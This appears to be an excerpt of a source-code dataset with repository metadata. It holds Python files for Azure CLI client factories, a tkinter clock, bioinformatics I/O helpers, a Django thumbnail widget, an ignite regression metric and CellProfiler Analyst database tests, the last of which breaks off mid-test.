return get_mgmt_service_client(cli_ctx, ResourceType.MGMT_AUTHORIZATION, subscription_id=subscription_id)
def get_container_service_client(cli_ctx, **_):
from azure.mgmt.containerservice import ContainerServiceClient
return get_mgmt_service_client(cli_ctx, ContainerServiceClient)
def get_osa_container_service_client(cli_ctx, **_):
from azure.mgmt.containerservice import ContainerServiceClient
return get_mgmt_service_client(cli_ctx, ContainerServiceClient, api_version='2019-04-30')
def get_graph_rbac_management_client(cli_ctx, **_):
from azure.cli.core.commands.client_factory import configure_common_settings
from azure.cli.core._profile import Profile
from azure.graphrbac import GraphRbacManagementClient
profile = Profile(cli_ctx=cli_ctx)
cred, _, tenant_id = profile.get_login_credentials(
resource=cli_ctx.cloud.endpoints.active_directory_graph_resource_id)
client = GraphRbacManagementClient(
cred, tenant_id,
base_url=cli_ctx.cloud.endpoints.active_directory_graph_resource_id)
configure_common_settings(cli_ctx, client)
return client
def get_resource_by_name(cli_ctx, resource_name, resource_type):
"""Returns the ARM resource in the current subscription with resource_name.
:param str resource_name: The name of resource
:param str resource_type: The type of resource
"""
result = get_resources_in_subscription(cli_ctx, resource_type)
elements = [item for item in result if item.name.lower() ==
resource_name.lower()]
if not elements:
from azure.cli.core._profile import Profile
profile = Profile(cli_ctx=cli_ctx)
message = "The resource with name '{}' and type '{}' could not be found".format(
resource_name, resource_type)
try:
subscription = profile.get_subscription(
cli_ctx.data['subscription_id'])
raise CLIError(
"{} in subscription '{} ({})'.".format(message, subscription['name'], subscription['id']))
except (KeyError, TypeError):
raise CLIError(
"{} in the current subscription.".format(message))
elif len(elements) == 1:
return elements[0]
else:
raise CLIError(
"More than one resources with type '{}' are found with name '{}'.".format(
resource_type, resource_name))
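# Illustrative, self-contained check (not from the source file) of the
# subscription-extraction regex used by get_auth_management_client above;
# the scope string is an invented example.
if __name__ == '__main__':
    import re
    scope = '/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/rg1'
    matched = re.match('/subscriptions/(?P<subscription>[^/]*)/', scope)
    assert matched.groupdict()['subscription'] == '00000000-0000-0000-0000-000000000000'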
| 39.280702
| 109
| 0.702546
|
from azure.cli.core.commands.client_factory import get_mgmt_service_client
from azure.cli.core.commands.parameters import get_resources_in_subscription
from azure.cli.core.profiles import ResourceType
from knack.util import CLIError
def cf_compute_service(cli_ctx, *_):
return get_mgmt_service_client(cli_ctx, ResourceType.MGMT_COMPUTE)
def cf_container_services(cli_ctx, *_):
return get_container_service_client(cli_ctx).container_services
def cf_managed_clusters(cli_ctx, *_):
return get_container_service_client(cli_ctx).managed_clusters
def cf_agent_pools(cli_ctx, *_):
return get_container_service_client(cli_ctx).agent_pools
def cf_openshift_managed_clusters(cli_ctx, *_):
return get_osa_container_service_client(cli_ctx).open_shift_managed_clusters
def cf_resource_groups(cli_ctx, subscription_id=None):
return get_mgmt_service_client(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES,
subscription_id=subscription_id).resource_groups
def cf_resources(cli_ctx, subscription_id=None):
return get_mgmt_service_client(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES,
subscription_id=subscription_id).resources
def cf_container_registry_service(cli_ctx, subscription_id=None):
return get_mgmt_service_client(cli_ctx, ResourceType.MGMT_CONTAINERREGISTRY,
subscription_id=subscription_id)
def get_auth_management_client(cli_ctx, scope=None, **_):
import re
subscription_id = None
if scope:
matched = re.match('/subscriptions/(?P<subscription>[^/]*)/', scope)
if matched:
subscription_id = matched.groupdict()['subscription']
return get_mgmt_service_client(cli_ctx, ResourceType.MGMT_AUTHORIZATION, subscription_id=subscription_id)
def get_container_service_client(cli_ctx, **_):
from azure.mgmt.containerservice import ContainerServiceClient
return get_mgmt_service_client(cli_ctx, ContainerServiceClient)
def get_osa_container_service_client(cli_ctx, **_):
from azure.mgmt.containerservice import ContainerServiceClient
return get_mgmt_service_client(cli_ctx, ContainerServiceClient, api_version='2019-04-30')
def get_graph_rbac_management_client(cli_ctx, **_):
from azure.cli.core.commands.client_factory import configure_common_settings
from azure.cli.core._profile import Profile
from azure.graphrbac import GraphRbacManagementClient
profile = Profile(cli_ctx=cli_ctx)
cred, _, tenant_id = profile.get_login_credentials(
resource=cli_ctx.cloud.endpoints.active_directory_graph_resource_id)
client = GraphRbacManagementClient(
cred, tenant_id,
base_url=cli_ctx.cloud.endpoints.active_directory_graph_resource_id)
configure_common_settings(cli_ctx, client)
return client
def get_resource_by_name(cli_ctx, resource_name, resource_type):
result = get_resources_in_subscription(cli_ctx, resource_type)
elements = [item for item in result if item.name.lower() ==
resource_name.lower()]
if not elements:
from azure.cli.core._profile import Profile
profile = Profile(cli_ctx=cli_ctx)
message = "The resource with name '{}' and type '{}' could not be found".format(
resource_name, resource_type)
try:
subscription = profile.get_subscription(
cli_ctx.data['subscription_id'])
raise CLIError(
"{} in subscription '{} ({})'.".format(message, subscription['name'], subscription['id']))
except (KeyError, TypeError):
raise CLIError(
"{} in the current subscription.".format(message))
elif len(elements) == 1:
return elements[0]
else:
raise CLIError(
"More than one resources with type '{}' are found with name '{}'.".format(
resource_type, resource_name))
| true
| true
|
1c490bdffe401b976343f5470b288a8b93ec6bba
| 714
|
py
|
Python
|
clock.py
|
Jownao/Clock_RealTIme
|
b3ca1ca88b5051f28d055d2bcd17c2107de3e007
|
[
"MIT"
] | null | null | null |
clock.py
|
Jownao/Clock_RealTIme
|
b3ca1ca88b5051f28d055d2bcd17c2107de3e007
|
[
"MIT"
] | null | null | null |
clock.py
|
Jownao/Clock_RealTIme
|
b3ca1ca88b5051f28d055d2bcd17c2107de3e007
|
[
"MIT"
] | null | null | null |
from tkinter import *
from tkinter import ttk
from tkinter import font
import time
import datetime
def quit(*args):
root.destroy()
def clock_time():
time = datetime.datetime.now()
time = (time.strftime("%H:%M:%S"))
txt.set(time)
root.after(1000,clock_time)
root = Tk()
root.attributes("-fullscreen",False)
root.configure(background='black')
root.bind('x',quit)
root.after(1000,clock_time)
fnt = font.Font(family = 'Helvetica',size = 30,weight = 'bold')
txt = StringVar()
lbl = ttk.Label(root, textvariable=txt, font = fnt, foreground = 'white', background = 'black')
lbl.place(relx = 0.5,rely = 0.5,anchor=CENTER)
root.title('Relógio Futurista')
root.geometry("500x300")
root.mainloop()
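# Note on the pattern above: root.after(ms, fn) schedules fn exactly once,
# so clock_time() must re-register itself on every tick; the root.after(1000,
# clock_time) call before mainloop() merely starts the chain.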
| 22.3125
| 95
| 0.70028
|
from tkinter import *
from tkinter import ttk
from tkinter import font
import time
import datetime
def quit(*args):
root.destroy()
def clock_time():
time = datetime.datetime.now()
time = (time.strftime("%H:%M:%S"))
txt.set(time)
root.after(1000,clock_time)
root = Tk()
root.attributes("-fullscreen",False)
root.configure(background='black')
root.bind('x',quit)
root.after(1000,clock_time)
fnt = font.Font(family = 'Helvetica',size = 30,weight = 'bold')
txt = StringVar()
lbl = ttk.Label(root, textvariable=txt, font = fnt, foreground = 'white', background = 'black')
lbl.place(relx = 0.5,rely = 0.5,anchor=CENTER)
root.title('Relógio Futurista')
root.geometry("500x300")
root.mainloop()
| true
| true
|
1c490c19f2b012bad0afacdd8c59b7c1426d59e5
| 1,934
|
py
|
Python
|
gimmebio/ponce_de_leon/gimmebio/ponce_de_leon/io_utils.py
|
Chandrima-04/gimmebio
|
cb3e66380006d5c5c00ff70bfb87317dd252c312
|
[
"MIT"
] | 3
|
2020-01-21T23:49:55.000Z
|
2020-07-29T17:02:30.000Z
|
gimmebio/ponce_de_leon/gimmebio/ponce_de_leon/io_utils.py
|
Chandrima-04/gimmebio
|
cb3e66380006d5c5c00ff70bfb87317dd252c312
|
[
"MIT"
] | null | null | null |
gimmebio/ponce_de_leon/gimmebio/ponce_de_leon/io_utils.py
|
Chandrima-04/gimmebio
|
cb3e66380006d5c5c00ff70bfb87317dd252c312
|
[
"MIT"
] | 4
|
2020-01-21T16:48:17.000Z
|
2020-03-13T15:34:52.000Z
|
from pysam import AlignmentFile as SamFile
import gzip
def remove_ext(filename, extensions):
ext = filename.split('.')[-1]
if ext in extensions:
without_ext = '.'.join(filename.split('.')[:-1])
return remove_ext(without_ext, extensions)
else:
return filename
def iter_chunks(handle, n, preprocess=lambda x: x):
chunk = [None] * n
for j, line in enumerate(handle):
i = j % n
if (i == 0) and (j != 0):
yield chunk
chunk = [None] * n
chunk[i] = preprocess(line)
yield chunk
def open_maybe_gzip(filename):
if isinstance(filename, str):
handle = open(filename)
else:
handle = filename
filename = handle.name
if '.gz' in filename:
handle = gzip.open(handle.buffer, mode='rt')
return handle
def open_samfile(handle):
ext = 'r'
if '.bam' in handle.name:
ext = 'rb'
samfile = SamFile(handle, ext)
return samfile
def parse_bed_file(bed_file):
out = {}
for line in bed_file:
tkns = line.split()
region = (int(tkns[1]), int(tkns[2]))
try:
out[tkns[0]].append(region)
except KeyError:
out[tkns[0]] = [region]
except IndexError:
continue
return out
def get_bc_token(id_line):
tkns = id_line.split()
for tkn in tkns:
if 'BX:' in tkn:
return tkn
def get_bc_sam(read):
return 'BX:Z:' + read.get_tag('BX') + ',BC:Z:' + read.get_tag('BC')
def get_read_id(id_line):
tkns = id_line.split()
return tkns[0][1:]
def parse_bc_map(filename):
bc_map = {}
handle = open_maybe_gzip(filename)
for chunk in iter_chunks(handle, 4):
rid = get_read_id(chunk[0])
bc = get_bc_token(chunk[0])
bc_map[rid] = bc
handle.close()
return bc_map
def parse_bc_list(handle):
return {bc.strip() for bc in handle}
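# Hypothetical demo of iter_chunks above (the input data is invented):
# group a FASTQ-like stream into 4-line records. The final chunk is padded
# with None when the line count is not a multiple of n.
if __name__ == '__main__':
    import io
    fake = io.StringIO('@r1\nACGT\n+\nIIII\n@r2\nTTTT\n+\nJJJJ\n')
    for record in iter_chunks(fake, 4, preprocess=str.strip):
        print(record)  # ['@r1', 'ACGT', '+', 'IIII'], then ['@r2', ...]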
| 22.229885
| 71
| 0.576008
|
from pysam import AlignmentFile as SamFile
import gzip
def remove_ext(filename, extensions):
ext = filename.split('.')[-1]
if ext in extensions:
without_ext = '.'.join(filename.split('.')[:-1])
return remove_ext(without_ext, extensions)
else:
return filename
def iter_chunks(handle, n, preprocess=lambda x: x):
chunk = [None] * n
for j, line in enumerate(handle):
i = j % n
if (i == 0) and (j != 0):
yield chunk
chunk = [None] * n
chunk[i] = preprocess(line)
yield chunk
def open_maybe_gzip(filename):
if isinstance(filename, str):
handle = open(filename)
else:
handle = filename
filename = handle.name
if '.gz' in filename:
handle = gzip.open(handle.buffer, mode='rt')
return handle
def open_samfile(handle):
ext = 'r'
if '.bam' in handle.name:
ext = 'rb'
samfile = SamFile(handle, ext)
return samfile
def parse_bed_file(bed_file):
out = {}
for line in bed_file:
tkns = line.split()
region = (int(tkns[1]), int(tkns[2]))
try:
out[tkns[0]].append(region)
except KeyError:
out[tkns[0]] = [region]
except IndexError:
continue
return out
def get_bc_token(id_line):
tkns = id_line.split()
for tkn in tkns:
if 'BX:' in tkn:
return tkn
def get_bc_sam(read):
return 'BX:Z:' + read.get_tag('BX') + ',BC:Z:' + read.get_tag('BC')
def get_read_id(id_line):
tkns = id_line.split()
return tkns[0][1:]
def parse_bc_map(filename):
bc_map = {}
handle = open_maybe_gzip(filename)
for chunk in iter_chunks(handle, 4):
rid = get_read_id(chunk[0])
bc = get_bc_token(chunk[0])
bc_map[rid] = bc
handle.close()
return bc_map
def parse_bc_list(handle):
return {bc.strip() for bc in handle}
| true
| true
|
1c490cee1fa1b4454900d769b260481d43b71339
| 144
|
py
|
Python
|
Apps/phnetskope/__init__.py
|
mattsayar-splunk/phantom-apps
|
b719b78ded609ae3cbd62d7d2cc317db1a613d3b
|
[
"Apache-2.0"
] | 74
|
2019-10-22T02:00:53.000Z
|
2022-03-15T12:56:13.000Z
|
Apps/phnetskope/__init__.py
|
mattsayar-splunk/phantom-apps
|
b719b78ded609ae3cbd62d7d2cc317db1a613d3b
|
[
"Apache-2.0"
] | 375
|
2019-10-22T20:53:50.000Z
|
2021-11-09T21:28:43.000Z
|
Apps/phnetskope/__init__.py
|
mattsayar-splunk/phantom-apps
|
b719b78ded609ae3cbd62d7d2cc317db1a613d3b
|
[
"Apache-2.0"
] | 175
|
2019-10-23T15:30:42.000Z
|
2021-11-05T21:33:31.000Z
|
# File: __init__.py
# Copyright (c) 2018-2020 Splunk Inc.
#
# Licensed under Apache 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt)
pass
| 20.571429
| 77
| 0.715278
|
pass
| true
| true
|
1c490edf4882c5f80d01f803ed6fbaf91e301788
| 1,662
|
py
|
Python
|
vendor-local/lib/python/easy_thumbnails/widgets.py
|
Koenkk/popcorn_maker
|
0978b9f98dacd4e8eb753404b24eb584f410aa11
|
[
"BSD-3-Clause"
] | 15
|
2015-03-23T02:55:20.000Z
|
2021-01-12T12:42:30.000Z
|
vendor-local/lib/python/easy_thumbnails/widgets.py
|
Koenkk/popcorn_maker
|
0978b9f98dacd4e8eb753404b24eb584f410aa11
|
[
"BSD-3-Clause"
] | null | null | null |
vendor-local/lib/python/easy_thumbnails/widgets.py
|
Koenkk/popcorn_maker
|
0978b9f98dacd4e8eb753404b24eb584f410aa11
|
[
"BSD-3-Clause"
] | 16
|
2015-02-18T21:43:31.000Z
|
2021-11-09T22:50:03.000Z
|
from django.forms.widgets import ClearableFileInput
from django.utils.safestring import mark_safe
from easy_thumbnails.files import get_thumbnailer
class ImageClearableFileInput(ClearableFileInput):
template_with_initial = u'%(clear_template)s<br />'\
u'%(input_text)s: %(input)s'
template_with_thumbnail = u'%(template)s<br />'\
u'<a href="%(source_url)s" target="_blank">%(thumb)s</a>'
def __init__(self, thumbnail_options=None, attrs=None):
thumbnail_options = thumbnail_options or {}
thumbnail_options = thumbnail_options.copy()
if 'size' not in thumbnail_options:
thumbnail_options['size'] = (80, 80)
self.thumbnail_options = thumbnail_options.copy()
super(ImageClearableFileInput, self).__init__(attrs)
def thumbnail_id(self, name):
return '%s_thumb_id' % name
def get_thumbnail(self, value):
thumbnailer = get_thumbnailer(value, value.name)
thumbnailer.source_storage = value.storage
if hasattr(value, 'thumbnail_storage'):
thumbnailer.thumbnail_storage = value.thumbnail_storage
return thumbnailer.get_thumbnail(self.thumbnail_options)
def render(self, name, value, attrs=None):
output = super(ImageClearableFileInput, self).render(name, value, attrs)
if not value:
return output
thumb = self.get_thumbnail(value)
substitution = {
'template': output,
'thumb': thumb.tag(id=self.thumbnail_id(name)),
'source_url': value.storage.url(value.name),
}
return mark_safe(self.template_with_thumbnail % substitution)
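# Hypothetical usage sketch (not from the source): wiring the widget into a
# Django form. The "photo" field name and 60x60 size are illustrative and
# assume a configured Django project.
# from django import forms
#
# class ProfileForm(forms.Form):
#     photo = forms.ImageField(
#         widget=ImageClearableFileInput(thumbnail_options={'size': (60, 60)}))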
| 40.536585
| 80
| 0.6787
|
from django.forms.widgets import ClearableFileInput
from django.utils.safestring import mark_safe
from easy_thumbnails.files import get_thumbnailer
class ImageClearableFileInput(ClearableFileInput):
template_with_initial = u'%(clear_template)s<br />'\
u'%(input_text)s: %(input)s'
template_with_thumbnail = u'%(template)s<br />'\
u'<a href="%(source_url)s" target="_blank">%(thumb)s</a>'
def __init__(self, thumbnail_options=None, attrs=None):
thumbnail_options = thumbnail_options or {}
thumbnail_options = thumbnail_options.copy()
if 'size' not in thumbnail_options:
thumbnail_options['size'] = (80, 80)
self.thumbnail_options = thumbnail_options.copy()
super(ImageClearableFileInput, self).__init__(attrs)
def thumbnail_id(self, name):
return '%s_thumb_id' % name
def get_thumbnail(self, value):
thumbnailer = get_thumbnailer(value, value.name)
thumbnailer.source_storage = value.storage
if hasattr(value, 'thumbnail_storage'):
thumbnailer.thumbnail_storage = value.thumbnail_storage
return thumbnailer.get_thumbnail(self.thumbnail_options)
def render(self, name, value, attrs=None):
output = super(ImageClearableFileInput, self).render(name, value, attrs)
if not value:
return output
thumb = self.get_thumbnail(value)
substitution = {
'template': output,
'thumb': thumb.tag(id=self.thumbnail_id(name)),
'source_url': value.storage.url(value.name),
}
return mark_safe(self.template_with_thumbnail % substitution)
| true
| true
|
1c490f1a380aadc639c7edc04e2cbf4c82624fbb
| 1,706
|
py
|
Python
|
ignite/contrib/metrics/regression/median_absolute_error.py
|
MinjaMiladinovic/ignite
|
007d320150fa915d7ac8757ddb586aaa9c427682
|
[
"BSD-3-Clause"
] | null | null | null |
ignite/contrib/metrics/regression/median_absolute_error.py
|
MinjaMiladinovic/ignite
|
007d320150fa915d7ac8757ddb586aaa9c427682
|
[
"BSD-3-Clause"
] | null | null | null |
ignite/contrib/metrics/regression/median_absolute_error.py
|
MinjaMiladinovic/ignite
|
007d320150fa915d7ac8757ddb586aaa9c427682
|
[
"BSD-3-Clause"
] | null | null | null |
from typing import Callable
import torch
from ignite.contrib.metrics.regression._base import _BaseRegressionEpoch
def median_absolute_error_compute_fn(y_pred: torch.Tensor, y: torch.Tensor) -> float:
e = torch.abs(y.view_as(y_pred) - y_pred)
return torch.median(e).item()
class MedianAbsoluteError(_BaseRegressionEpoch):
r"""Calculates the Median Absolute Error.
.. math::
\text{MdAE} = \text{MD}_{j=1,n} \left( |A_j - P_j| \right)
where :math:`A_j` is the ground truth and :math:`P_j` is the predicted value.
More details can be found in `Botchkarev 2018`__.
- ``update`` must receive output of the form ``(y_pred, y)`` or ``{'y_pred': y_pred, 'y': y}``.
- `y` and `y_pred` must be of same shape `(N, )` or `(N, 1)` and of type `float32`.
.. warning::
Current implementation stores all input data (output and target) as tensors before computing the metric.
This can potentially lead to a memory error if the input data is larger than available RAM.
__ https://arxiv.org/abs/1809.03006
Args:
output_transform: a callable that is used to transform the
:class:`~ignite.engine.engine.Engine`'s ``process_function``'s output into the
form expected by the metric. This can be useful if, for example, you have a multi-output model and
you want to compute the metric with respect to one of the outputs.
By default, metrics require the output as ``(y_pred, y)`` or ``{'y_pred': y_pred, 'y': y}``.
"""
def __init__(self, output_transform: Callable = lambda x: x):
super(MedianAbsoluteError, self).__init__(median_absolute_error_compute_fn, output_transform)
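# Hypothetical usage sketch (tensor values invented): the absolute errors
# are 0.5, 0.5 and 1.0, so the computed MdAE is their median, 0.5. Assumes
# the reset/update/compute interface that ignite epoch metrics expose.
if __name__ == '__main__':
    metric = MedianAbsoluteError()
    metric.reset()
    metric.update((torch.tensor([2.5, 3.5, 3.0]), torch.tensor([2.0, 3.0, 4.0])))
    print(metric.compute())  # 0.5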
| 38.772727
| 113
| 0.679367
|
from typing import Callable
import torch
from ignite.contrib.metrics.regression._base import _BaseRegressionEpoch
def median_absolute_error_compute_fn(y_pred: torch.Tensor, y: torch.Tensor) -> float:
e = torch.abs(y.view_as(y_pred) - y_pred)
return torch.median(e).item()
class MedianAbsoluteError(_BaseRegressionEpoch):
def __init__(self, output_transform: Callable = lambda x: x):
super(MedianAbsoluteError, self).__init__(median_absolute_error_compute_fn, output_transform)
| true
| true
|
1c490f47c60297228bf1fa9cffdab0f6612b2215
| 15,337
|
py
|
Python
|
cpa/tests/testdbconnect.py
|
DavidStirling/CellProfiler-Analyst
|
7a0bfcb5cc7db067844595bdbb90f3132f9a8ea9
|
[
"MIT"
] | 98
|
2015-02-05T18:22:04.000Z
|
2022-03-29T12:06:48.000Z
|
cpa/tests/testdbconnect.py
|
DavidStirling/CellProfiler-Analyst
|
7a0bfcb5cc7db067844595bdbb90f3132f9a8ea9
|
[
"MIT"
] | 268
|
2015-01-14T15:43:24.000Z
|
2022-02-13T22:04:37.000Z
|
cpa/tests/testdbconnect.py
|
DavidStirling/CellProfiler-Analyst
|
7a0bfcb5cc7db067844595bdbb90f3132f9a8ea9
|
[
"MIT"
] | 64
|
2015-06-30T22:26:03.000Z
|
2022-03-11T01:06:13.000Z
|
import unittest
from cpa.dbconnect import *
from cpa.properties import Properties
class TestDBConnect(unittest.TestCase):
def setup_mysql(self):
self.p = Properties()
self.db = DBConnect()
self.db.Disconnect()
self.p.LoadFile('../../CPAnalyst_test_data/nirht_test.properties')
def setup_sqlite(self):
self.p = Properties()
self.db = DBConnect()
self.db.Disconnect()
self.p.LoadFile('../../CPAnalyst_test_data/nirht_local.properties')
def setup_sqlite2(self):
self.p = Properties()
self.db = DBConnect()
self.db.Disconnect()
self.p.LoadFile('../../CPAnalyst_test_data/export_to_db_test.properties')
#
# Test module-level functions
#
def test_clean_up_colnames(self):
self.setup_mysql()
def test_well_key_columns(self):
self.setup_mysql()
assert well_key_columns() == ('plate', 'well')
self.setup_sqlite()
assert well_key_columns() == tuple()
def test_image_key_columns(self):
self.setup_mysql()
assert image_key_columns() == ('ImageNumber',)
self.setup_sqlite()
assert image_key_columns() == ('TableNumber','ImageNumber')
def test_object_key_columns(self):
self.setup_mysql()
assert object_key_columns() == ('ImageNumber','ObjectNumber')
self.setup_sqlite()
assert object_key_columns() == ('TableNumber', 'ImageNumber','ObjectNumber')
def test_GetWhereClauseForObjects(self):
self.setup_mysql()
assert GetWhereClauseForObjects([(1,1)]) == '(ImageNumber=1 AND ObjectNumber=1)'
assert GetWhereClauseForObjects([(1,1), (2,1)]) == '(ImageNumber=1 AND ObjectNumber=1 OR ImageNumber=2 AND ObjectNumber=1)'
self.setup_sqlite()
assert GetWhereClauseForObjects([(0,1,1), (0,2,1)]) == '(TableNumber=0 AND ImageNumber=1 AND ObjectNumber=1 OR TableNumber=0 AND ImageNumber=2 AND ObjectNumber=1)'
def test_GetWhereClauseForImages(self):
self.setup_mysql()
assert GetWhereClauseForImages([(1,)]) == 'ImageNumber IN (1)'
assert GetWhereClauseForImages([(1,), (2,)]) == 'ImageNumber IN (1,2)'
self.setup_sqlite()
assert GetWhereClauseForImages([(0,1), (0,2)]) == '(TableNumber=0 AND ImageNumber IN (1,2))'
def test_UniqueObjectClause(self):
self.setup_mysql()
assert UniqueObjectClause() == 'ImageNumber,ObjectNumber'
self.setup_sqlite()
assert UniqueObjectClause() == 'TableNumber,ImageNumber,ObjectNumber'
def test_UniqueImageClause(self):
self.setup_mysql()
assert UniqueImageClause() == 'ImageNumber'
self.setup_sqlite()
assert UniqueImageClause() == 'TableNumber,ImageNumber'
#
# Test class functions
#
def test_Connect_Disconnect(self):
self.setup_mysql()
self.db.connect()
assert len(self.db.connections)==1
assert len(self.db.cursors)==1
assert len(self.db.connectionInfo)==1
self.db.connect()
assert len(self.db.connections)==1
assert len(self.db.cursors)==1
assert len(self.db.connectionInfo)==1
self.db.Disconnect()
assert len(self.db.connections)==0
assert len(self.db.cursors)==0
assert len(self.db.connectionInfo)==0
self.setup_sqlite()
assert len(self.db.connections)==0
assert len(self.db.cursors)==0
assert len(self.db.connectionInfo)==0
self.db.GetAllImageKeys()
assert len(self.db.connections)==1
assert len(self.db.cursors)==1
assert len(self.db.connectionInfo)==1
self.db.GetAllImageKeys()
assert len(self.db.connections)==1
assert len(self.db.cursors)==1
assert len(self.db.connectionInfo)==1
self.db.Disconnect()
assert len(self.db.connections)==0
assert len(self.db.cursors)==0
assert len(self.db.connectionInfo)==0
def test_Commit(self):
self.setup_mysql()
self.db.connect()
self.db.execute('DROP TABLE IF EXISTS temp_test')
self.db.execute('CREATE TABLE temp_test (id int(11) default NULL)')
self.db.execute('INSERT INTO temp_test values(1)')
self.db.Commit()
self.db.Disconnect()
self.db.connect()
res = self.db.execute('SELECT id FROM temp_test WHERE id=1')
assert res == [(1,)]
self.db.execute('DROP TABLE temp_test')
def test_execute(self):
self.setup_mysql()
self.db.execute('SELECT %s FROM %s'%(self.p.image_id,self.p.image_table))
self.setup_sqlite()
self.db.execute('SELECT %s FROM %s'%(self.p.image_id,self.p.image_table))
def test_GetObjectIDAtIndex(self):
self.setup_mysql()
obKey = self.db.GetObjectIDAtIndex(imKey=(1,), index=94)
assert obKey==(1,94)
self.setup_sqlite()
obKey = self.db.GetObjectIDAtIndex(imKey=(0,1), index=94)
assert obKey==(0,1,94)
def test_GetPerImageObjectCounts(self):
self.setup_mysql()
self.db.GetPerImageObjectCounts()
self.setup_sqlite()
self.db.GetPerImageObjectCounts()
def test_GetObjectCoords(self):
self.setup_mysql()
xy = self.db.GetObjectCoords((1,1))
assert xy==(11.4818, 305.06400000000002)
self.setup_sqlite()
xy = self.db.GetObjectCoords((0,1,1))
assert xy==(11.4818, 305.06400000000002)
def test_GetObjectNear(self):
self.setup_mysql()
obKey = self.db.GetObjectNear((1,), 11, 300)
assert obKey == (1,1)
self.setup_sqlite()
obKey = self.db.GetObjectNear((0,1), 11, 300)
assert obKey == (0,1,1)
def test_GetFullChannelPathsForImage(self):
self.setup_mysql()
paths = self.db.GetFullChannelPathsForImage((1,))
assert paths==['2006_02_15_NIRHT/trcHT29Images/NIRHTa+001/AS_09125_050116000001_A01f00d2.DIB',
'2006_02_15_NIRHT/trcHT29Images/NIRHTa+001/AS_09125_050116000001_A01f00d1.DIB',
'2006_02_15_NIRHT/trcHT29Images/NIRHTa+001/AS_09125_050116000001_A01f00d0.DIB']
self.setup_sqlite()
paths = self.db.GetFullChannelPathsForImage((0,1))
assert paths==['2006_02_15_NIRHT/trcHT29Images/NIRHTa+001/AS_09125_050116000001_A01f00d2.DIB',
'2006_02_15_NIRHT/trcHT29Images/NIRHTa+001/AS_09125_050116000001_A01f00d1.DIB',
'2006_02_15_NIRHT/trcHT29Images/NIRHTa+001/AS_09125_050116000001_A01f00d0.DIB']
def test_GetGroupMaps(self):
self.setup_mysql()
groupMaps, colNames = self.db.GetGroupMaps()
assert groupMaps['Gene'][(1,)] == ('Gabra3',)
assert groupMaps['Well'][(1,)] == (1,)
assert groupMaps['Well+Gene'][(1,)] == (1, 'Gabra3')
assert colNames == {'Gene': ['gene'], 'Well': ['well'], 'Well+Gene': ['well', 'gene']}
self.setup_sqlite()
groupMaps, colNames = self.db.GetGroupMaps()
assert groupMaps['96x4'][(0,1)] == (0,1)
assert colNames == {'96x4': ['T2', 'I2']}
def test_GetFilteredImages(self):
self.setup_mysql()
test = set(self.db.GetFilteredImages('MAPs'))
print(test)
vals = set([(239,), (21,), (32,), (197,), (86,), (23,), (61,), (72,), (213,), (222,), (63,), (229,), (221,), (38,), (224,), (231,), (13,), (24,), (78,), (214,), (15,), (223,), (53,), (64,), (246,), (55,), (93,), (232,), (30,), (206,), (95,), (215,), (5,), (16,), (70,), (7,), (45,), (56,), (238,), (198,), (47,), (207,), (85,), (96,), (22,), (87,), (253,), (8,), (62,), (254,), (255,), (199,), (37,), (48,), (205,), (230,), (208,), (39,), (77,), (88,), (14,), (79,), (245,), (256,), (54,), (247,), (29,), (40,), (94,), (31,), (240,), (69,), (80,), (6,), (216,), (71,), (237,), (248,), (200,), (46,)])
assert test == vals
assert self.db.GetFilteredImages('IMPOSSIBLE') == []
self.setup_sqlite()
assert self.db.GetFilteredImages('FirstTen') == [(0,1),(0,2),(0,3),(0,4),(0,5),(0,6),(0,7),(0,8),(0,9),(0,10)]
assert self.db.GetFilteredImages('IMPOSSIBLE') == []
def test_GetColumnNames(self):
self.setup_mysql()
cols = self.db.GetColumnNames(self.p.object_table)
assert cols[:19] == ['ImageNumber', 'ObjectNumber', 'Nuclei_Location_CenterX', 'Nuclei_Location_CenterY', 'Nuclei_Children_Cells_Count', 'Nuclei_Correlation_Correlation_DNA_and_pH3', 'Nuclei_Correlation_Correlation_DNA_and_Actin', 'Nuclei_Correlation_Correlation_pH3_and_Actin', 'Nuclei_AreaShape_Area', 'Nuclei_AreaShape_Eccentricity', 'Nuclei_AreaShape_Solidity', 'Nuclei_AreaShape_Extent', 'Nuclei_AreaShape_Euler_number', 'Nuclei_AreaShape_Perimeter', 'Nuclei_AreaShape_Form_factor', 'Nuclei_AreaShape_MajorAxisLength', 'Nuclei_AreaShape_MinorAxisLength', 'Nuclei_AreaShape_Orientation', 'Nuclei_AreaShape_Zernike0_0']
assert cols[-20:] == ['AreaNormalized_Cytoplasm_AreaShape_Zernike5_3', 'AreaNormalized_Cytoplasm_AreaShape_Zernike5_5', 'AreaNormalized_Cytoplasm_AreaShape_Zernike6_0', 'AreaNormalized_Cytoplasm_AreaShape_Zernike6_2', 'AreaNormalized_Cytoplasm_AreaShape_Zernike6_4', 'AreaNormalized_Cytoplasm_AreaShape_Zernike6_6', 'AreaNormalized_Cytoplasm_AreaShape_Zernike7_1', 'AreaNormalized_Cytoplasm_AreaShape_Zernike7_3', 'AreaNormalized_Cytoplasm_AreaShape_Zernike7_5', 'AreaNormalized_Cytoplasm_AreaShape_Zernike7_7', 'AreaNormalized_Cytoplasm_AreaShape_Zernike8_0', 'AreaNormalized_Cytoplasm_AreaShape_Zernike8_2', 'AreaNormalized_Cytoplasm_AreaShape_Zernike8_4', 'AreaNormalized_Cytoplasm_AreaShape_Zernike8_6', 'AreaNormalized_Cytoplasm_AreaShape_Zernike8_8', 'AreaNormalized_Cytoplasm_AreaShape_Zernike9_1', 'AreaNormalized_Cytoplasm_AreaShape_Zernike9_3', 'AreaNormalized_Cytoplasm_AreaShape_Zernike9_5', 'AreaNormalized_Cytoplasm_AreaShape_Zernike9_7', 'AreaNormalized_Cytoplasm_AreaShape_Zernike9_9']
self.setup_sqlite()
cols = self.db.GetColumnNames(self.p.object_table)
